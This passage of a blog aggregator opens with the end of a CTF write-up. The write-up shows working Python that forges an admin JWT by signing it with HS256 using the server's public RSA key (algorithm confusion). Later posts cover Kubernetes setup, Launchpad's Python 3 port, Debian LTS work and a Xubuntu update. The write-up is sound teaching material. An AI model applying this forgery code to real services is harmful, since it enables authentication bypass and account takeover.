    return jwt.utils.force_bytes(k)

jwt.algorithms.HMACAlgorithm.prepare_key = prepare_key

A few things should stand out to you:

  • The flag is passed to the template no matter what, so it’s probably some simple template logic to determine whether or not to show the flag.
  • The only username and password accepted for login is a hard-coded value of “test” and “test”.
  • We see that JWTs are being used to manage user sessions. These are stored in a session cookie, creatively called authme_session.
  • There are multiple keys and algorithms supported.

The RSA public key is provided, but there’s no indication that it’s a weak key in any way. (It’s not, as far as I know…) When verifying the JWT, it’s worth noting that rather than passing the algorithm for the specific key, the library is passed both RS256 and HS256. This means that both keys can be used with both algorithms when decoding the session.

Using an HMAC-SHA-256 key as an RSA key is probably not helpful (especially if you don’t know the HMAC key), but what about the reverse – using an RSA key as an HMAC-SHA-256 key? Examining the code, it shows that the public key is passed in to the verification function. Maybe we can sign a JWT using the public RSA key, but the HS256 algorithm in the JWT?

import hashlib
import jwt

def prepare_key(unused_self, k):
    if k is None:
        raise ValueError('Missing key!')
    if len(k) < 32:
        return jwt.utils.force_bytes(hashlib.sha256(k).hexdigest())
    return jwt.utils.force_bytes(k)

jwt.algorithms.HMACAlgorithm.prepare_key = prepare_key

key = open('k2', 'rb').read()
print(jwt.encode({"username": "admin"}, key=key, algorithm='HS256',
    headers={"kid": "k2"}))

prepare_key is copied directly from the authme source. This prints a JWT, but does it work?


If we put this into our session cookie in our browser and refresh, we’re presented with the reward:


This is a vulnerability called JWT algorithm confusion. See “Critical vulnerabilities in JSON Web Token libraries” and “JSON Web Token attacks and vulnerabilities” for more about this.
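Under the hood there is no RSA at all in the forged token: it is plain HMAC-SHA-256 keyed with the public key bytes. Stripped of the JWT library, the forgery can be sketched with only the standard library (the helper names are mine, and the PEM bytes stand in for the real k2 public key):

```python
import base64
import hashlib
import hmac
import json

def b64url(data):
    # JWT-style unpadded base64url encoding
    return base64.urlsafe_b64encode(data).rstrip(b"=")

def forge_hs256(payload, public_key_pem, kid):
    # Sign with HS256, but use the *public* RSA key bytes as the HMAC
    # secret -- exactly what the confused verifier does on its side.
    header = {"alg": "HS256", "typ": "JWT", "kid": kid}
    signing_input = (b64url(json.dumps(header).encode()) + b"." +
                     b64url(json.dumps(payload).encode()))
    sig = hmac.new(public_key_pem, signing_input, hashlib.sha256).digest()
    return (signing_input + b"." + b64url(sig)).decode()
```

Because the verifier recomputes the same HMAC over the same bytes with the same (public!) key, the forged signature validates.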

on August 12, 2021 07:00 AM

August 03, 2021

Using NFS persistent volumes is a relatively easy (for kubernetes) on-ramp to using the kubernetes storage infrastructure. Before following this guide, you should have an installed kubernetes cluster. If you don’t, check out the guide how to Install K3s. Setting up the NFS share: we will share a directory on the primary cluster node for all the other nodes to access. I will assume that you want to share a filesystem mounted at /mnt/storage-disk.
on August 03, 2021 04:02 PM
While I don’t find the dashboard very useful for configuring anything in the cluster, it can be helpful to find a resource you’ve lost track of or discover resources you didn’t know were there. Before following this guide, you should have an installed kubernetes cluster. If you don’t, check out the guide how to Install K3s. Installing the dashboard: to install the dashboard we need to run the following command on the primary cluster node (in my example, this is k8s-1).
on August 03, 2021 04:01 PM

August 02, 2021

After a very long porting journey, Launchpad is finally running on Python 3 across all of our systems.

I wanted to take a bit of time to reflect on why my emotional responses to this port differ so much from those of some others who’ve done large ports, such as the Mercurial maintainers. It’s hard to deny that we’ve had to burn a lot of time on this, which I’m sure has had an opportunity cost, and from one point of view it’s essentially running to stand still: there is no single compelling feature that we get solely by porting to Python 3, although it’s clearly a prerequisite for tidying up old compatibility code and being able to use modern language facilities in the future. And yet, on the whole, I found this a rewarding project and enjoyed doing it.

Some of this may be because by inclination I’m a maintenance programmer and actually enjoy this sort of thing. My default view tends to be that software version upgrades may be a pain but it’s much better to get that pain over with as soon as you can rather than trying to hold back the tide; you can certainly get involved and try to shape where things end up, but rightly or wrongly I can’t think of many cases when a righteously indignant user base managed to arrange for the old version to be maintained in perpetuity so that they never had to deal with the new thing (OK, maybe Perl 5 counts here).

I think a more compelling difference between Launchpad and Mercurial, though, may be that very few other people really had a vested interest in what Python version Launchpad happened to be running, because it’s all server-side code (aside from some client libraries such as launchpadlib, which were ported years ago). As such, we weren’t trying to do this with the internet having Strong Opinions at us. We were doing this because it was obviously the only long-term-maintainable path forward, and in more recent times because some of our library dependencies were starting to drop support for Python 2 and so it was obviously going to become a practical problem for us sooner or later; but if we’d just stayed on Python 2 forever then fundamentally hardly anyone else would really have cared directly, only maybe about some indirect consequences of that. I don’t follow Mercurial development so I may be entirely off-base, but if other people were yelling at me about how late my project was to finish its port, that in itself would make me feel more negatively about the project even if I thought it was a good idea. Having most of the pressure come from ourselves rather than from outside meant that wasn’t an issue for us.

I’m somewhat inclined to think of the process as an extreme version of paying down technical debt. Moving from Python 2.7 to 3.5, as we just did, means skipping over multiple language versions in one go, and if similar changes had been made more gradually it would probably have felt a lot more like the typical dependency update treadmill. I appreciate why not everyone might want to think of it this way: maybe this is just my own rationalization.

Reflections on porting to Python 3

I’m not going to defend the Python 3 migration process; it was pretty rough in a lot of ways. Nor am I going to spend much effort relitigating it here, as it’s already been done to death elsewhere, and as I understand it the core Python developers have got the message loud and clear by now. At a bare minimum, a lot of valuable time was lost early in Python 3’s lifetime hanging on to flag-day-type porting strategies that were impractical for large projects, when it should have been providing for “bilingual” strategies (code that runs in both Python 2 and 3 for a transitional period) which is where most libraries and most large migrations ended up in practice. For instance, the early advice to library maintainers to maintain two parallel versions or perhaps translate dynamically with 2to3 was entirely impractical in most non-trivial cases and wasn’t what most people ended up doing, and yet the idea that 2to3 is all you need still floats around Stack Overflow and the like as a result. (These days, I would probably point people towards something more like Eevee’s porting FAQ as somewhere to start.)

There are various fairly straightforward things that people often suggest could have been done to smooth the path, and I largely agree: not removing the u'' string prefix only to put it back in 3.3, fewer gratuitous compatibility breaks in the name of tidiness, and so on. But if I had a time machine, the number one thing I would ask to have been done differently would be introducing type annotations in Python 2 before Python 3 branched off. It’s true that it’s technically possible to do type annotations in Python 2, but the fact that it’s a different syntax that would have to be fixed later is offputting, and in practice it wasn’t widely used in Python 2 code. To make a significant difference to the ease of porting, annotations would need to have been introduced early enough that lots of Python 2 library code used them so that porting code didn’t have to be quite so much of an exercise of manually figuring out the exact nature of string types from context.
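For illustration, here is the Python 2-compatible “type comment” syntax next to the Python 3 annotation it later had to be rewritten into (function names invented for the example):

```python
# Python 2-compatible form: the annotation hides in a comment where the
# Python 2 parser cannot see it, so it must be migrated by hand later.
def native_width(value):
    # type: (str) -> int
    return len(value)

# Python 3 form: the same information lives in the signature itself.
def native_width_py3(value: str) -> int:
    return len(value)
```

Both behave identically at runtime; only tooling reads the annotations.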

Launchpad is a complex piece of software that interacts with multiple domains: for example, it deals with a database, HTTP, web page rendering, Debian-format archive publishing, and multiple revision control systems, and there’s often overlap between domains. Each of these tends to imply different kinds of string handling. Web page rendering is normally done mainly in Unicode, converting to bytes as late as possible; revision control systems normally want to spend most of their time working with bytes, although the exact details vary; HTTP is of course bytes on the wire, but Python’s WSGI interface has some string type subtleties. In practice I found myself thinking about at least four string-like “types” (that is, things that in a language with a stricter type system I might well want to define as distinct types and restrict conversion between them): bytes, text, “ordinary” native strings (str in either language, encoded to UTF-8 in Python 2), and native strings with WSGI’s encoding rules. Some of these are emergent properties of writing in the intersection of Python 2 and 3, which is effectively a specialized language of its own without coherent official documentation whose users must intuit its behaviour by comparing multiple sources of information, or by referring to unofficial porting guides: not a very satisfactory situation. Fortunately much of the complexity collapses once it becomes possible to write solely in Python 3.

Some of the difficulties we ran into are not ones that are typically thought of as Python 2-to-3 porting issues, because they were changed later in Python 3’s development process. For instance, the email module was substantially improved in around the 3.2/3.3 timeframe to handle Python 3’s bytes/text model more correctly, and since Launchpad sends quite a few different kinds of email messages and has some quite picky tests for exactly what it emits, this entailed a lot of work in our email sending code and in our test suite to account for that. (It took me a while to work out whether we should be treating raw email messages as bytes or as text; bytes turned out to work best.) 3.4 made some tweaks to the implementation of quoted-printable encoding that broke a number of our tests in ways that took some effort to fix, because the tests needed to work on both 2.7 and 3.5. The list goes on. I got quite proficient at digging through Python’s git history to figure out when and why some particular bit of behaviour had changed.

One of the thorniest problems was parsing HTTP form data. We mainly rely on zope.publisher for this, which in turn relied on cgi.FieldStorage; but cgi.FieldStorage is badly broken in some situations on Python 3. Even if that bug were fixed in a more recent version of Python, we can’t easily use anything newer than 3.5 for the first stage of our port due to the version of the base OS we’re currently running, so it wouldn’t help much. In the end I fixed some minor issues in the multipart module (and was kindly given co-maintenance of it) and converted zope.publisher to use it. Although this took a while to sort out, it seems to have gone very well.

A couple of other interesting late-arriving issues were around pickle. For most things we normally prefer safer formats such as JSON, but there are a few cases where we use pickle, particularly for our session databases. One of my colleagues pointed out that I needed to remember to tell pickle to stick to protocol 2, so that we’d be able to switch back and forward between Python 2 and 3 for a while; quite right, and we later ran into a similar problem with marshal too. A more surprising problem was that datetime.datetime objects pickled on Python 2 require special care when unpickling on Python 3; rather than the approach that ended up being implemented and documented for Python 3.6, though, I preferred a custom unpickler, both so that things would work on Python 3.5 and so that I wouldn’t have to risk affecting the decoding of other pickled strings in the session database.
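The protocol pinning amounts to one keyword argument; a minimal sketch (the helper name and payload are mine), where the point is that Python 3.5 defaults to protocol 3, which Python 2 cannot read at all:

```python
import pickle

# Highest pickle protocol that Python 2.7 understands.
PY2_COMPATIBLE_PROTOCOL = 2

def dump_session(value):
    # Always pin the protocol: anything newer written into shared
    # session data would be unreadable by the Python 2 processes
    # during the transition.
    return pickle.dumps(value, protocol=PY2_COMPATIBLE_PROTOCOL)
```

A protocol-2 pickle is recognizable by its two-byte prefix, the PROTO opcode followed by the protocol number.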

General lessons

Writing this over a year after Python 2’s end-of-life date, and certainly nowhere near the leading edge of Python 3 porting work, it’s perhaps more useful to look at this in terms of the lessons it has for other large technical debt projects.

I mentioned in my previous article that I used the approach of an enormous and frequently-rebased git branch as a working area for the port, committing often and sometimes combining and extracting commits for review once they seemed to be ready. A port of this scale would have been entirely intractable without a tool of similar power to git rebase, so I’m very glad that we finished migrating to git in 2019. I relied on this right up to the end of the port, and it also allowed for quick assessments of how much more there was to land. git worktree was also helpful, in that I could easily maintain working trees built for each of Python 2 and 3 for comparison.

As is usual for most multi-developer projects, all changes to Launchpad need to go through code review, although we sometimes make exceptions for very simple and obvious changes that can be self-reviewed. Since I knew from the outset that this was going to generate a lot of changes for review, I therefore structured my work from the outset to try to make it as easy as possible for my colleagues to review it. This generally involved keeping most changes to a somewhat manageable size of 800 lines or less (although this wasn’t always possible), and arranging commits mainly according to the kind of change they made rather than their location. For example, when I needed to fix issues with / in Python 3 being true division rather than floor division, I did so in one commit across the various places where it mattered and took care not to mix it with other unrelated changes. This is good practice for nearly any kind of development, but it was especially important here since it allowed reviewers to consider a clear explanation of what I was doing in the commit message and then skim-read the rest of it much more quickly.
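The division change mentioned above is tiny but representative of the kind of fix that benefits from being grouped into one commit:

```python
# On Python 2, / between ints is floor division; on Python 3 it is true
# division, so every call site has to declare which one it meant.
assert 7 // 2 == 3       # floor division, same result on both versions
assert 7 / 2 == 3.5      # true division, Python 3 semantics
assert -7 // 2 == -4     # floor division rounds towards negative infinity
```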

It was vital to keep the codebase in a working state at all times, and deploy to production reasonably often: this way if something went wrong the amount of code we had to debug to figure out what had happened was always tractable. (Although I can’t seem to find it now to link to it, I saw an account a while back of a company that had taken a flag-day approach instead with a large codebase. It seemed to work for them, but I’m certain we couldn’t have made it work for Launchpad.)

I can’t speak too highly of Launchpad’s test suite, much of which originated before my time. Without a great deal of extensive coverage of all sorts of interesting edge cases at both the unit and functional level, and a corresponding culture of maintaining that test suite well when making new changes, it would have been impossible to be anything like as confident of the port as we were.

As part of the porting work, we split out a couple of substantial chunks of the Launchpad codebase that could easily be decoupled from the core: its Mailman integration and its code import worker. Both of these had substantial dependencies with complex requirements for porting to Python 3, and arranging to be able to do these separately on their own schedule was absolutely worth it. Like disentangling balls of wool, any opportunity you can take to make things less tightly-coupled is probably going to make it easier to disentangle the rest. (I can see a tractable way forward to porting the code import worker, so we may well get that done soon. Our Mailman integration will need to be rewritten, though, since it currently depends on the Python-2-only Mailman 2, and Mailman 3 has a different architecture.)

Python lessons

Our database layer was already in pretty good shape for a port, since at least the modern bits of its table modelling interface were already strict about using Unicode for text columns. If you have any kind of pervasive low-level framework like this, then making it be pedantic at you in advance of a Python 3 port will probably incur much less swearing in the long run, as you won’t be trying to deal with quite so many bytes/text issues at the same time as everything else.

Early in our port, we established a standard set of __future__ imports and started incrementally converting files over to them, mainly because we weren’t yet sure what else to do and it seemed likely to be helpful. absolute_import was definitely reasonable (and not often a problem in our code), and print_function was annoying but necessary. In hindsight I’m not sure about unicode_literals, though. For files that only deal with bytes and text it was reasonable enough, but as I mentioned above there were also a number of cases where we needed literals of the language’s native str type, i.e. bytes in Python 2 and text in Python 3: this was particularly noticeable in WSGI contexts, but also cropped up in some other surprising places. We generally either omitted unicode_literals or used six.ensure_str in such cases, but it was definitely a bit awkward and maybe I should have listened more to people telling me it might be a bad idea.

A lot of Launchpad’s early tests used doctest, mainly in the style where you have text files that interleave narrative commentary with examples. The development team later reached consensus that this was best avoided in most cases, but by then there were far too many doctests to conveniently rewrite in some other form. Porting doctests to Python 3 is really annoying. You run into all the little changes in how objects are represented as text (particularly u'...' versus '...', but plenty of other cases as well); you have next to no tools to do anything useful like skipping individual bits of a doctest that don’t apply; using __future__ imports requires the rather obscure approach of adding the relevant names to the doctest’s globals in the relevant DocFileSuite or DocTestSuite; dealing with many exception tracebacks requires something like zope.testing.renormalizing; and whatever code refactoring tools you’re using probably don’t work properly. Basically, don’t have done that. It did all turn out to be tractable for us in the end, and I managed to avoid using much in the way of fragile doctest extensions aside from the aforementioned zope.testing.renormalizing, but it was not an enjoyable experience.
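For the record, the "rather obscure approach" works because doctest extracts compiler flags from any `__future__` feature objects it finds in the test's globals. A minimal sketch (my own illustration, not Launchpad's test setup):

```python
import __future__
import doctest
import os
import tempfile

# doctest scans the globs dict for __future__ feature objects (keyed by the
# feature's name) and compiles the examples with the matching compiler
# flags, so placing print_function there enables it inside the doctest.
# On Python 3 this is a no-op, since print is already a function.
fd, path = tempfile.mkstemp(suffix=".txt")
with os.fdopen(fd, "w") as f:
    f.write(">>> print('hello')\nhello\n")

results = doctest.testfile(
    path,
    module_relative=False,
    globs={"print_function": __future__.print_function},
)
os.remove(path)
```

The same `globs` trick applies to `DocFileSuite` and `DocTestSuite` from `zope.testing` or the standard library.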


I know of nine regressions that reached Launchpad’s production systems as a result of this porting work; of course there were various other regressions caught by CI or in manual testing. (Considering the size of this project, I count it as a resounding success that there were only nine production issues, and that for the most part we were able to fix them quickly.)

Equality testing of removed database objects

One of the things we had to do while porting to Python 3 was to implement the __eq__, __ne__, and __hash__ special methods for all our database objects. This was quite conceptually fiddly, because doing this requires knowing each object’s primary key, and that may not yet be available if we’ve created an object in Python but not yet flushed the actual INSERT statement to the database (most of our primary keys are auto-incrementing sequences). We thus had to take care to flush pending SQL statements in such cases in order to ensure that we know the primary keys.
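The general shape of the idea looks something like this (a simplified sketch with hypothetical class names, not Launchpad's actual implementation): equality and hashing are based on the object's class and primary key, flushing pending INSERTs first so the key is known.

```python
class FakeStore:
    """Stand-in for the ORM store/session (hypothetical)."""

    def __init__(self):
        self._next_id = 1
        self._pending = []

    def add(self, obj):
        self._pending.append(obj)

    def flush(self):
        # Simulate the database assigning auto-incrementing primary keys.
        for obj in self._pending:
            obj.id = self._next_id
            self._next_id += 1
        self._pending = []


class DatabaseObject:
    """Sketch of primary-key-based equality and hashing."""

    def __init__(self, store):
        self.store = store
        self.id = None  # primary key; unknown until the INSERT is flushed

    def _ensure_id(self):
        # Flush pending SQL so the primary key is assigned before we compare.
        if self.id is None:
            self.store.flush()

    def __eq__(self, other):
        if not isinstance(other, DatabaseObject):
            return NotImplemented
        self._ensure_id()
        other._ensure_id()
        return (type(self), self.id) == (type(other), other.id)

    def __ne__(self, other):
        result = self.__eq__(other)
        return result if result is NotImplemented else not result

    def __hash__(self):
        self._ensure_id()
        return hash((type(self), self.id))


store = FakeStore()
a = DatabaseObject(store)
b = DatabaseObject(store)
store.add(a)
store.add(b)
```

Comparing `a == b` here forces a flush, after which both objects have distinct primary keys.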

However, it’s possible to have a problem at the other end of the object lifecycle: that is, a Python object might still be reachable in memory even though the underlying row has been DELETEd from the database. In most cases we don’t keep removed objects around for obvious reasons, but it can happen in caching code, and buildd-manager crashed as a result (in fact while it was still running on Python 2). We had to take extra care to avoid this problem.

Debian imports crashed on non-UTF-8 filenames

Python 2 has some unfortunate behaviour around passing bytes or Unicode strings (depending on the platform) to shutil.rmtree, and the combination of some porting work and a particular source package in Debian that contained a non-UTF-8 file name caused us to run into this. The fix was to ensure that the argument passed to shutil.rmtree is a str regardless of Python version.

We’d actually run into something similar before: it’s a subtle porting gotcha, since it’s quite easy to end up passing Unicode strings to shutil.rmtree if you’re in the process of porting your code to Python 3, and you might easily not notice if the file names in your tests are all encoded using UTF-8.
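The shape of the fix can be sketched like this (a hypothetical helper, not Launchpad's actual code): coerce the argument to the native `str` type before calling `shutil.rmtree`, so Python 2 works with bytes paths internally and never has to decode non-UTF-8 child names.

```python
import os
import shutil
import sys
import tempfile

def remove_tree(path):
    """Remove a tree that may contain non-UTF-8 file names (a sketch).

    On Python 2, passing a unicode path makes shutil.rmtree try to decode
    each child name, which fails on non-UTF-8 names; passing the native
    str (bytes) avoids that.  On Python 3 the text path is fine as-is.
    """
    if sys.version_info[0] == 2 and not isinstance(path, str):
        path = path.encode(sys.getfilesystemencoding() or "utf-8")
    shutil.rmtree(path)

# Demo: a tree containing a non-UTF-8 file name is removed without error.
root = tempfile.mkdtemp()
with open(os.path.join(os.fsencode(root), b"\xfcname"), "wb") as f:
    f.write(b"x")
remove_tree(root)
```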

lazr.restful ETags

We eventually got far enough along that we could switch one of our four appserver machines (we have quite a number of other machines too, but the appservers handle web and API requests) to Python 3 and see what happened. By this point our extensive test suite had shaken out the vast majority of the things that could go wrong, but there was always going to be room for some interesting edge cases.

A member of the Ubuntu kernel team reported that they were seeing an increase in 412 Precondition Failed errors in some of their scripts that use our webservice API. These can happen when you’re trying to modify an existing resource: the underlying protocol involves sending an If-Match header with the ETag that the client thinks the resource has, and if this doesn’t match the ETag that the server calculates for the resource then the client has to refresh its copy of the resource and try again. We initially thought that this might be legitimate since it can happen in normal operation if you collide with another client making changes to the same resource, but it soon became clear that something stranger was going on: we were getting inconsistent ETags for the same object even when it was unchanged. Since we’d recently switched a quarter of our appservers to Python 3, that was a natural suspect.


Our lazr.restful package provides the framework for our webservice API, and roughly speaking it generates ETags by serializing objects into some kind of canonical form and hashing the result. Unfortunately the serialization was dependent on the Python version in a few ways, and in particular it serialized lists of strings such as lists of bug tags differently: Python 2 used [u'foo', u'bar', u'baz'] where Python 3 used ['foo', 'bar', 'baz']. In lazr.restful 1.0.3 we switched to using JSON for this, removing the Python version dependency and ensuring consistent behaviour between appservers.
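The failure mode and the fix can be illustrated in miniature (this is an illustration, not lazr.restful's actual code): hashing a `repr`-based serialization bakes the Python version into the ETag, while hashing a canonical JSON form does not.

```python
import hashlib
import json

def etag_json(value):
    """Version-independent ETag: hash a canonical JSON serialization."""
    canonical = json.dumps(value, sort_keys=True, separators=(",", ":"))
    return hashlib.sha1(canonical.encode("utf-8")).hexdigest()

# The old repr-based form depended on the Python version:
#   repr([u'foo', u'bar']) -> "[u'foo', u'bar']" on Python 2
#   repr(['foo', 'bar'])   -> "['foo', 'bar']"   on Python 3
# so the same bug-tag list hashed to different ETags on different appservers.
tags = ["foo", "bar", "baz"]
etag = etag_json(tags)
```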

Memory leaks

This problem took the longest to solve. We noticed fairly quickly from our graphs that the appserver machine we’d switched to Python 3 had a serious memory leak. Our appservers had always been a bit leaky, but now it wasn’t so much “a small hole that we can bail occasionally” as “the boat is sinking rapidly”:

A serious memory leak

(Yes, this got in the way of working out what was going on with ETags for a while.)

I spent ages messing around with various attempts to fix this. Since only a quarter of our appservers were affected, and we could get by on 75% capacity for a while, it wasn’t urgent but it was definitely annoying. After spending some quality time with objgraph, for some time I thought traceback reference cycles might be at fault, and I sent a number of fixes to various upstream projects for those (e.g. zope.pagetemplate). Those didn’t help the leaks much though, and after a while it became clear to me that this couldn’t be the sole problem: Python has a cyclic garbage collector that will eventually collect reference cycles as long as there are no strong references to any objects in them, although it might not happen very quickly. Something else must be going on.

Debugging reference leaks in any non-trivial and long-running Python program is extremely arduous, especially with ORMs that naturally tend to end up with lots of cycles and caches. After a while I formed a hypothesis that zope.server might be keeping a strong reference to something, although I never managed to nail it down more firmly than that. This was an attractive theory as we were already in the process of migrating to Gunicorn for other reasons anyway, and Gunicorn also has a convenient max_requests setting that’s good at mitigating memory leaks. Getting this all in place took some time, but once we did we found that everything was much more stable:

A rather flat memory graph

This isn’t completely satisfying as we never quite got to the bottom of the leak itself, and it’s entirely possible that we’ve only papered over it using max_requests: I expect we’ll gradually back off on how frequently we restart workers over time to try to track this down. However, pragmatically, it’s no longer an operational concern.
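For reference, the worker-recycling mitigation amounts to a couple of lines in a Gunicorn configuration file (illustrative values, not Launchpad's actual settings):

```python
# gunicorn.conf.py (illustrative values)
max_requests = 1000        # recycle each worker after this many requests
max_requests_jitter = 100  # stagger restarts so workers don't recycle at once
```

`max_requests_jitter` randomizes the restart point per worker, which avoids all workers restarting simultaneously under uniform load.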

Mirror prober HTTPS proxy handling

After we switched our script servers to Python 3, we had several reports of mirror probing failures. (Launchpad keeps lists of Ubuntu archive and image mirrors, and probes them every so often to check that they’re reasonably complete and up to date.) This only affected HTTPS mirrors when probed via a proxy server, support for which is a relatively recent feature in Launchpad and involved some code that we never managed to unit-test properly: of course this is exactly the code that went wrong. Sadly I wasn’t able to sort out that gap, but at least the fix was simple.

Non-MIME-encoded email headers

As I mentioned above, there were substantial changes in the email package between Python 2 and 3, and indeed between minor versions of Python 3. Our test coverage here is pretty good, but it’s an area where it’s very easy to have gaps. We noticed that a script that processes incoming email was crashing on messages with headers that were non-ASCII but not MIME-encoded (and indeed then crashing again when it tried to send a notification of the crash!). The only examples of these I looked at were spam, but we still didn’t want to crash on them.

The fix involved being somewhat more careful about both the handling of headers returned by Python’s email parser and the building of outgoing email notifications. This seems to be working well so far, although I wouldn’t be surprised to find the odd other incorrect detail in this sort of area.

Failure to handle non-ISO-8859-1 URL-encoded form input

Remember how I said that parsing HTTP form data was thorny? After we finished upgrading all our appservers to Python 3, people started reporting that they couldn’t post Unicode comments to bugs, which turned out to be only if the attempt was made using JavaScript, and was because I hadn’t quite managed to get URL-encoded form data working properly with zope.publisher and multipart. The current standard describes the URL-encoded format for form data as “in many ways an aberrant monstrosity”, so this was no great surprise.

Part of the problem was some very strange choices in zope.publisher dating back to 2004 or earlier, which I attempted to clean up and simplify. The rest was that Python 2’s urlparse.parse_qs unconditionally decodes percent-encoded sequences as ISO-8859-1 if they’re passed in as part of a Unicode string, so multipart needs to work around this on Python 2.
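The difference is easy to demonstrate on Python 3, where `parse_qs` decodes percent-escapes as UTF-8 by default (and takes an explicit `encoding=` argument):

```python
from urllib.parse import parse_qs

# Python 3: percent-encoded UTF-8 form data decodes correctly.
form = parse_qs("comment=caf%C3%A9")

# Python 2's urlparse.parse_qs, given a unicode string, instead decoded
# the percent-escaped bytes as ISO-8859-1, yielding mojibake like
# u'caf\xc3\xa9' -- which is what multipart has to work around there.
```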

I’m still not completely confident that this is correct in all situations, but at least now that we’re on Python 3 everywhere the matrix of cases we need to care about is smaller.

Inconsistent marshalling of Loggerhead’s disk cache

We use Loggerhead for providing web browsing of Bazaar branches. When we upgraded one of its two servers to Python 3, we immediately noticed that the one still on Python 2 was failing to read back its revision information cache, which it stores in a database on disk. (We noticed this because it caused a deployment to fail: when we tried to roll out new code to the instance still on Python 2, Nagios checks had already caused an incompatible cache to be written for one branch from the Python 3 instance.)

This turned out to be a similar problem to the pickle issue mentioned above, except this one was with marshal, which I didn’t think to look for because it’s a relatively obscure module mostly used for internal purposes by Python itself; I’m not sure that Loggerhead should really be using it in the first place. The fix was relatively straightforward, complicated mainly by now needing to cope with throwing away unreadable cache data.

Ironically, if we’d just gone ahead and taken the nominally riskier path of upgrading both servers at the same time, we might never have had a problem here.

Intermittent bzr failures

Finally, after we upgraded one of our two Bazaar codehosting servers to Python 3, we had a report of intermittent bzr branch hangs. After some digging I found this in our logs:

Traceback (most recent call last):
  File "/srv/", line 136, in addWindowBytes
  File "/srv/", line 88, in startWriting
  File "/srv/", line 894, in resumeProducing
    for p in self.pipes.itervalues():
builtins.AttributeError: 'dict' object has no attribute 'itervalues'

I’d seen this before in our git hosting service: it was a bug in Twisted’s Python 3 port, fixed after 20.3.0 but unfortunately after the last release that supported Python 2, so we had to backport that patch. Using the same backport dealt with this.
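The underlying incompatibility is simple; the portable spelling works on both versions (an illustration, not the actual Twisted patch):

```python
pipes = {"a": 1, "b": 2}

# Python 2 only -- raises AttributeError on Python 3:
#     for p in pipes.itervalues(): ...

# Portable on both versions (builds a list on Python 2, a view on Python 3):
total = sum(pipes.values())
```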


on August 02, 2021 10:34 AM

August 01, 2021

Here’s my (twenty-second) monthly but brief update about the activities I’ve done in the F/L/OSS world.


This was my 31st month of actively contributing to Debian. I became a DM in late March 2019 and a DD on Christmas ‘19! \o/

I spent most of my free time on Clubhouse but still did everything I usually do (but did not go much beyond that, really).

Anyway, I did the following stuff in Debian:

Uploads and bug fixes:

Other $things:

  • Mentoring for newcomers.
  • Moderation of -project mailing list.


This was my 6th month of actively contributing to Ubuntu. Now that I’ve joined Canonical to work on Ubuntu full-time, there’s a bunch of things I do! \o/

I mostly worked on different things, I guess. But mostly on packaging keylime and some Google Agents upload(s) and SRU(s). Also did a lot of reviewing, et al.

I was too lazy to maintain a list of things I worked on so there’s no concrete list atm. Maybe I’ll get back to this section later or will start to list stuff from next month onward, as I’ve been doing before. :D

Debian (E)LTS

Debian Long Term Support (LTS) is a project to extend the lifetime of all Debian stable releases to (at least) 5 years. Debian LTS is not handled by the Debian security team, but by a separate group of volunteers and companies interested in making it a success.

And Debian Extended LTS (ELTS) is its sister project, extending support to the Jessie release (+2 years after LTS support).

This was my twenty-second month as a Debian LTS and eleventh month as a Debian ELTS paid contributor.
I was assigned 39.75 hours for LTS and 40.00 hours for ELTS and worked on the following things:

LTS CVE Fixes and Announcements:

ELTS CVE Fixes and Announcements:

Other (E)LTS Work:

  • Front-desk duty from 26-07 until 01-08 for both LTS and ELTS.
  • Triaged nodejs, mongodb, bluez, libmatio, mbedtls, node-url-parse, otrs2, polipo, ruby-bindata, util-linux, exiv2, ruby2.3, varnish, gdal, prosody, glibc, gdal, rpm, icu, ckeditor, libvirt, libjdom1-java, libjdom2-java, tesseract, util-linux, qemu, pillow, tomcat8, libcommons-compress-java, 389-ds-base, and intel-microcode.
  • Mark CVE-2021-22930/nodejs as end-of-life for stretch.
  • Mark CVE-2021-20333/mongodb as end-of-life for stretch.
  • Mark CVE-2021-3652/389-ds-base as no-dsa for stretch.
  • Mark CVE-2021-3658/bluez as no-dsa for stretch.
  • Mark CVE-2020-19497/libmatio as no-dsa for stretch.
  • Mark CVE-2021-24119/mbedtls as no-dsa for stretch.
  • Mark CVE-2021-3664/node-url-parse as end-of-life for stretch.
  • Mark CVE-2021-36091/otrs2 as no-dsa for stretch.
  • Mark CVE-2021-36092/otrs2 as no-dsa for stretch.
  • Mark CVE-2020-36420/polipo as ignored for stretch.
  • Mark CVE-2021-32823/ruby-bindata as no-dsa for stretch.
  • Mark CVE-2021-37600/util-linux as no-dsa for stretch.
  • Mark CVE-2019-25050/gdal as not-affected for stretch.
  • Mark CVE-2021-37601/prosody as not-affected for stretch instead.
  • Mark CVE-2021-35942/glibc as no-dsa for jessie.
  • Mark CVE-2021-36081/tesseract as not-affected for jessie.
  • Mark CVE-2021-35939/rpm as no-dsa for jessie.
  • Mark CVE-2021-35938/rpm as no-dsa for jessie.
  • Mark CVE-2021-35937/rpm as no-dsa for jessie.
  • Mark CVE-2021-30535/icu as not-affected for jessie.
  • Mark CVE-2021-3667/libvirt as not-affected for jessie.
  • Mark CVE-2021-3631/libvirt as no-dsa for jessie.
  • Mark CVE-2021-21391/ckeditor as no-dsa for jessie.
  • Mark CVE-2021-36090/libcommons-compress-java as no-dsa for jessie.
  • Mark CVE-2021-3638/qemu as not-affected for jessie.
  • Mark CVE-2021-34552/pillow as no-dsa for jessie.
  • Mark CVE-2021-37600/util-linux as no-dsa for jessie.
  • Mark CVE-2019-25050/gdal as not-affected for jessie.
  • Mark CVE-2021-3658/bluez as no-dsa for jessie.
  • Auto EOL’ed tiff, dcraw, libspring-security-2.0-java, rabbitmq-server, unrar-nonfree, darktable, mruby, htslib, ndpi, sam2p, libmatio, webkit2gtk, mongodb, otrs2, nodejs, vlc, jruby, asterisk, drupal7, libapache2-mod-auth-openidc, mosquitto, sylpheed, claws-mail, prosody, libapache2-mod-auth-mellon, and linux for jessie.
  • Fix version of libjdom2-java’s ELA.
  • Attended monthly Debian LTS meeting.
  • Answered questions (& discussions) on IRC (#debian-lts and #debian-elts).
  • General and other discussions on LTS private and public mailing list.

Until next time.
:wq for today.

on August 01, 2021 05:41 AM

July 29, 2021

Xubuntu 21.10 Dev Update

I'm finally getting back to regular FOSS development time, this time focusing again on Xubuntu. Resuming team votes and getting community feedback has kicked off development on Xubuntu 21.10 "Impish Indri". Recent team votes have expanded Xubuntu's collection of apps. Read on to learn more!

Update 7/31: Added Hexchat as another GTK 2 application. Thanks Yousuf!

New Additions

Disk Usage Analyzer (baobab)

Baobab is a utility that scans your storage devices and remote locations and reports on the disk space used by each file or directory. It's useful for tracking down what's eating your disk space so you can keep your storage from filling up.

Baobab makes it easy to visualize your disk usage and drill down to find large files.

Disks (gnome-disk-utility)

